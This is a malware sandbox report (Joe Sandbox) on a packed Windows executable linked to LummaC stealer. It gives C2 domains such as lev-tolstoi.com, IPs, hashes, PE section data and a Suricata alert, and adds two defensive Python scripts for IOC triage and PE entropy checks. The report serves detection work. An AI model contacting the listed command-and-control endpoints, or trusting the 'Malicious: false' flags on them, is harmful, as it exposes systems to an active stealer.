  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://steamcommunity.com/workshop/
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://login.steampowered.com/
  Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
  Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://support.mozilla.org/products/firefoxgro.all
  Source: tPSrcPbmRe.exe, 00000000.00000003.2271122226.0000000005DFD000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
URL: https://lev-tolstoi.com:443/api8
  Source: tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: unknown
URL: https://store.steampowered.com/legal/
  Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp; tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false    Reputation: high
IP             Domain              Country        ASN    ASN Name         Malicious
104.21.66.86   lev-tolstoi.com     United States  13335  CLOUDFLARENETUS  false
23.55.153.106  steamcommunity.com  United States  20940  AKAMAI-ASN1EU    false
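Two things in the URL and IP rows above deserve a practitioner's check before they are turned into blocklist entries. The Malicious column reads "false" for every row, including the three lev-tolstoi.com /api strings whose reputation the report could only rate "unknown", so that column cannot drive the decision on its own. And the one IP behind lev-tolstoi.com, 104.21.66.86, belongs to CLOUDFLARENET, a shared-tenant range; the similar-samples table further down shows the same address fronting an unrelated FormBook sample, so an IP block would hit other customers while the domain is the durable indicator. The script below is an added example, not part of the Joe Sandbox report or of any Joe tooling: it re-parses rows copied from this page in the flattened form the page renders (URL, dump sources and malicious flag run together, reputation on the following line), groups them by host, joins the IP table, flags hosts rated "unknown" as candidates, and recommends a domain-only block when the host's IP sits in a shared CDN ASN. The row grammar, the SHARED_ASNS list, the block_on labels, and the reading of the 16-hex-digit field of a dump name as the dumped region's base address are this example's own assumptions; the first row is shortened to its first two dumps.

```python
"""IOC triage over the URL and IP rows of a Joe Sandbox report (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE = "tPSrcPbmRe.exe"

# Four rows copied from the report's URL table, flattened as the page shows them:
# "<url><sample>, <dump>[, <sample>, <dump>...]<malicious>" then the reputation line.
URL_ROWS = """\
https://lev-tolstoi.com:443/apiWdtPWdtPtPSrcPbmRe.exe, 00000000.00000002.2377038945.000000000133F000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmpfalse
unknown
https://medal.tvtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
high
https://lev-tolstoi.com/apiBytPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
high
"""

# From the report's IP table: (ip, domain, asn, asn name).
IP_ROWS = [
    ("104.21.66.86", "lev-tolstoi.com", 13335, "CLOUDFLARENETUS"),
    ("23.55.153.106", "steamcommunity.com", 20940, "AKAMAI-ASN1EU"),
]

# ASNs whose addresses front many unrelated tenants (assumed list, not from the
# report): an IP block there causes collateral damage, so block the domain only.
SHARED_ASNS = {13335, 20940}

# One flattened row: the URL ends where the first "<sample>, " source begins.
ROW_RE = re.compile(
    r"^(?P<url>https?://\S*?)"
    + re.escape(SAMPLE) + r", "
    + r"(?P<sources>.*?\.sdmp)"
    + r"(?P<malicious>true|false)$"
)
# Dump file name; the 16-hex-digit field is taken to be the region base address
# (assumption about Joe Sandbox naming, not stated on the page).
DUMP_RE = re.compile(r"\d{8}\.\d{8}\.\d{10}\.([0-9A-F]{16})\.(?:[0-9A-F]{8}\.){4}sdmp")


def parse_url_rows(text):
    """Return one dict per URL row: url, host, regions, malicious, reputation."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected URL line / reputation line pairs")
    records = []
    for row, reputation in zip(lines[0::2], lines[1::2]):
        m = ROW_RE.match(row)
        if m is None:
            raise ValueError(f"unparsed row: {row[:60]}...")
        records.append({
            "url": m["url"],
            "host": urlsplit(m["url"]).hostname,
            "regions": DUMP_RE.findall(m["sources"]),
            "malicious": m["malicious"] == "true",
            "reputation": reputation,
        })
    return records


def triage(records, ip_rows=IP_ROWS, shared_asns=SHARED_ASNS):
    """Group by host and decide whether, and on what, to block.

    A host is a candidate when the report could not rate it ("unknown"). The
    report's Malicious column is parsed but deliberately not used here, since
    it is "false" for every row on this page, the /api strings included.
    """
    by_host = defaultdict(lambda: {"urls": [], "reputations": set(), "regions": set()})
    for r in records:
        h = by_host[r["host"]]
        h["urls"].append(r["url"])
        h["reputations"].add(r["reputation"])
        h["regions"].update(r["regions"])
    resolved = {domain: (ip, asn, name) for ip, domain, asn, name in ip_rows}

    result = {}
    for host, h in by_host.items():
        ip, asn, asn_name = resolved.get(host, (None, None, None))
        candidate = "unknown" in h["reputations"]
        if not candidate:
            block_on = None
        elif ip is None or asn in shared_asns:
            block_on = "domain"        # shared CDN address: domain is the only safe IOC
        else:
            block_on = "domain+ip"     # dedicated address: both indicators are usable
        result[host] = {
            "candidate": candidate, "block_on": block_on,
            "ip": ip, "asn": asn, "asn_name": asn_name,
            "urls": sorted(h["urls"]), "regions": sorted(h["regions"]),
        }
    return result


if __name__ == "__main__":
    for host, info in triage(parse_url_rows(URL_ROWS)).items():
        flag = "IOC" if info["candidate"] else "   "
        print(f"{flag} {host:24} block_on={info['block_on']!s:10} ip={info['ip']} asn={info['asn_name']}")
```

Run as-is it lists lev-tolstoi.com as the only candidate with block_on=domain; steamcommunity.com and medal.tv are rated "high" and stay unflagged. To apply it to a full report, paste the whole URL table into URL_ROWS and the whole IP table into IP_ROWS; rows from other samples need SAMPLE changed, since the sample name is the only delimiter between the URL and its first source.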
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579658
Start date and time: 2024-12-23 07:08:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: tPSrcPbmRe.exe (renamed because the original name is a hash value)
Original Sample Name: 259cea876b4ff788ed27fab1f9a978ce.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target tPSrcPbmRe.exe, PID 6480 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
01:09:16  API Interceptor  15x Sleep call for process: tPSrcPbmRe.exe modified
Match  Associated Sample Name / URL  Detection  Threat Name  Context
Match: 104.21.66.86
  MV ROCKET_PDA.exe  malicious  FormBook
    Context: www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
Match: 23.55.153.106
  NQbg5Ht2hW.exe    malicious  LummaC
  BZuk2UI1RC.exe    malicious  LummaC
  uLkHEqZ3u3.exe    malicious  LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar
  hAmnMk8afk.exe    malicious  LummaC
  EI3TafelpV.exe    malicious  LummaC
  6S7hoBEHvr.exe    malicious  LummaC
  uZO96rXyWt.exe    malicious  LummaC
  Neverlose.cc.exe  malicious  LummaC
  Launcher_x64.exe  malicious  LummaC
  WonderHack.exe    malicious  LummaC
Match | Associated Sample Name / URL | Detection | Threat Name | Context
lev-tolstoi.com | NQbg5Ht2hW.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | BZuk2UI1RC.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.21.66.86
lev-tolstoi.com | EI3TafelpV.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | 6S7hoBEHvr.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | uZO96rXyWt.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | Neverlose.cc.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | Launcher_x64.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | WonderHack.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | Launcher.exe | malicious | LummaC | 104.21.66.86
steamcommunity.com | NQbg5Ht2hW.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | BZuk2UI1RC.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 23.55.153.106
steamcommunity.com | hAmnMk8afk.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | EI3TafelpV.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 6S7hoBEHvr.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | uZO96rXyWt.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | Neverlose.cc.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | Launcher_x64.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | WonderHack.exe | malicious | LummaC | 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | NQbg5Ht2hW.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | BZuk2UI1RC.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 23.55.153.106
AKAMAI-ASN1EU | gVKsiQIHqe.exe | malicious | Vidar | 23.44.201.28
AKAMAI-ASN1EU | hAmnMk8afk.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | EI3TafelpV.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 6S7hoBEHvr.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | uZO96rXyWt.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | trZG6pItZj.exe | malicious | Vidar | 23.209.72.32
AKAMAI-ASN1EU | Neverlose.cc.exe | malicious | LummaC | 23.55.153.106
CLOUDFLARENETUS | NQbg5Ht2hW.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | BZuk2UI1RC.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.21.66.86
CLOUDFLARENETUS | gVKsiQIHqe.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | EI3TafelpV.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | 6S7hoBEHvr.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | DHL AWB-documents.lnk | malicious | Divulge Stealer | 162.159.138.232
CLOUDFLARENETUS | Rokadernes.vbs | malicious | Remcos, GuLoader | 104.21.86.72
CLOUDFLARENETUS | uZO96rXyWt.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | trZG6pItZj.exe | malicious | Vidar | 172.64.41.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | NQbg5Ht2hW.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | BZuk2UI1RC.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | hAmnMk8afk.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | EI3TafelpV.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | 6S7hoBEHvr.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | uZO96rXyWt.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | Echelon.exe | malicious | LummaC Stealer | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | Neverlose.cc.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | bas.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948115741174554
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: tPSrcPbmRe.exe
File size: 1'866'752 bytes
MD5: 259cea876b4ff788ed27fab1f9a978ce
SHA1: 97928786646a7187c2a02c4acb9fb5b863dc1721
SHA256: 7d6d42d07947b28756c4c28821f090b28d8f5f1262d355cd0a6d8ec02b49e81b
SHA512: 5c9b2adbae358aed3f6efdfaf1ebc0c5dba3e755ba5d9cc35fb0306079df621a5b168feb945054dfeeb0c898d069d5948a53ea0728996bc7218fb4dacdfc1c2e
SSDEEP: 24576:RRSCLKmHkCDlblfhSqBmdGiTJhoUfLeYXrYW+3RJ/fnVcgtppWJ0k7FjjcmPmM:RzLz/lxhSRRDoUzu3RJ/PVc4+0k7V31
TLSH: 6A8533B5ACB56518C16AB4F7BF1763C23F2AD05D0A86C34CAD563B69C737E8256F0801
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x89b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
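The static fields above (an 8-bit entropy of 7.948 over the whole file, an entry point of 0x89b000 that resolves into .taggant rather than a conventional code section, and a raw TimeDateStamp of 0x675F3CD1) are the checks an analyst reproduces on the sample before any dynamic run. The following is an added example, not Joe Sandbox code and not part of this report: a dependency-free Python PE32 parser that computes Shannon entropy per file and per section, resolves the entry point to the section that contains it, flags sections that are both writable and executable, and decodes the timestamp. The list of "standard" code-section names, the 7.0-bit packing threshold and the two-section PE image it builds are constructed for the example; that image reuses only this report's entry point VA, image base and timestamp so its output lines up with the fields above.

```python
"""Static PE triage: entropy, entry-point section, W+X sections, timestamp.
Added example with a constructed PE32 image; not Joe Sandbox code."""
import math
import struct
from datetime import datetime, timezone

# Conventional code-section names (assumed list for this example, not exhaustive).
# An entry point anywhere else is the "entry point outside standard sections" tell.
STANDARD_CODE_SECTIONS = {b".text", b"CODE", b".code", b"INIT", b".init"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PACKED_ENTROPY_THRESHOLD = 7.0   # rule of thumb; compressed/encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_timestamp(ts: int) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def parse_pe(image: bytes) -> dict:
    """Minimal PE parser: entry RVA, image base, timestamp and the section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                     # IMAGE_FILE_HEADER
    machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, fh)
    opt = fh + 20                                         # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    ep_rva = struct.unpack_from("<I", image, opt + 16)[0]
    # ImageBase is a DWORD at +28 in PE32 (0x10B) and a QWORD at +24 in PE32+ (0x20B).
    image_base = (struct.unpack_from("<I", image, opt + 28)[0] if magic == 0x10B
                  else struct.unpack_from("<Q", image, opt + 24)[0])
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i                     # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, off)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "chars": chars, "raw": image[rawptr:rawptr + rawsize]})
    return {"machine": machine, "timestamp": ts, "entry_rva": ep_rva,
            "image_base": image_base, "sections": sections}


def triage(image: bytes) -> dict:
    """The checks a sandbox's static-info block summarises, as one dictionary."""
    pe = parse_pe(image)
    ep = pe["entry_rva"]
    ep_sec = next((s for s in pe["sections"]
                   if s["va"] <= ep < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    wx = [s["name"] for s in pe["sections"]
          if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE]
    file_entropy = shannon_entropy(image)
    return {
        "entry_va": pe["image_base"] + ep,                # what the report prints as Entrypoint
        "entry_section": ep_sec["name"] if ep_sec else None,
        "entry_outside_standard": ep_sec is None or ep_sec["name"] not in STANDARD_CODE_SECTIONS,
        "file_entropy": file_entropy,
        "packed_suspect": file_entropy > PACKED_ENTROPY_THRESHOLD,
        "section_entropy": {s["name"]: shannon_entropy(s["raw"]) for s in pe["sections"]},
        "writable_executable": wx,
        "timestamp": pe_timestamp(pe["timestamp"]),
    }


def build_sample_image() -> bytes:
    """Constructed two-section PE32 reusing the report's entry VA, base and timestamp."""
    text_raw = b"\x90" * 60 + b"\xc3" * 4                 # low-entropy stub
    packed_raw = bytes(range(256))                        # every byte value once: 8.0 bits
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0x675F3CD1, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32
    struct.pack_into("<I", opt, 16, 0x49B000)             # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)             # ImageBase
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, len(text_raw), 0x200,
                       0, 0, 0, 0, 0x60000020)            # CODE | EXECUTE | READ
    secs += struct.pack("<8sIIIIIIHHI", b".taggant", 0x1000, 0x49B000, len(packed_raw), 0x240,
                        0, 0, 0, 0, 0xE0000040)           # DATA | EXECUTE | READ | WRITE
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + secs
    return headers.ljust(0x200, b"\0") + text_raw + packed_raw


if __name__ == "__main__":
    for key, value in triage(build_sample_image()).items():
        print(f"{key}: {value}")
```

Against a real sample, `triage(open(path, "rb").read())` gives the same dictionary; on the constructed image the entry resolves to 0x89b000 in .taggant, that section is both writable and executable, and the timestamp decodes to the report's "Sun Dec 15 20:32:17 2024 UTC". Per-section entropy is more useful than the whole-file figure, since a small clear stub next to one near-8.0 section is the usual packer shape.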
Instruction
jmp 00007F9C80CBF0DAh
cvtps2pd xmm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F9C80CC10D5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax+000000FEh], ah
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [ecx], cl
                                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x51000 | 0x24800 | 8a65e749c2398ecb94bd7ceeb2dfbbf7 | False | 0.9973980629280822 | data | 7.985147260170899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x54000 | 0x2a6000 | 0x200 | b153287ca836110ea7505c2b9d944355 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lyuxeqdh | 0x2fa000 | 0x1a0000 | 0x19f800 | 7e71b600c0144517bbc1fe9cfb80fe77 | False | 0.9946136290989771 | data | 7.9536418626160845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yvyxycgn | 0x49a000 | 0x1000 | 0x400 | 756bcd6b1cfe5556e89b92fcba76924e | False | 0.75390625 | data | 5.904567489349839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49b000 | 0x3000 | 0x2200 | 5b5219b58ccef4d756432506062a65c1 | False | 0.05755974264705882 | DOS executable (COM) | 0.6695504840035633 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T07:09:17.454637+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.6 | 50836 | 1.1.1.1 | 53 | UDP
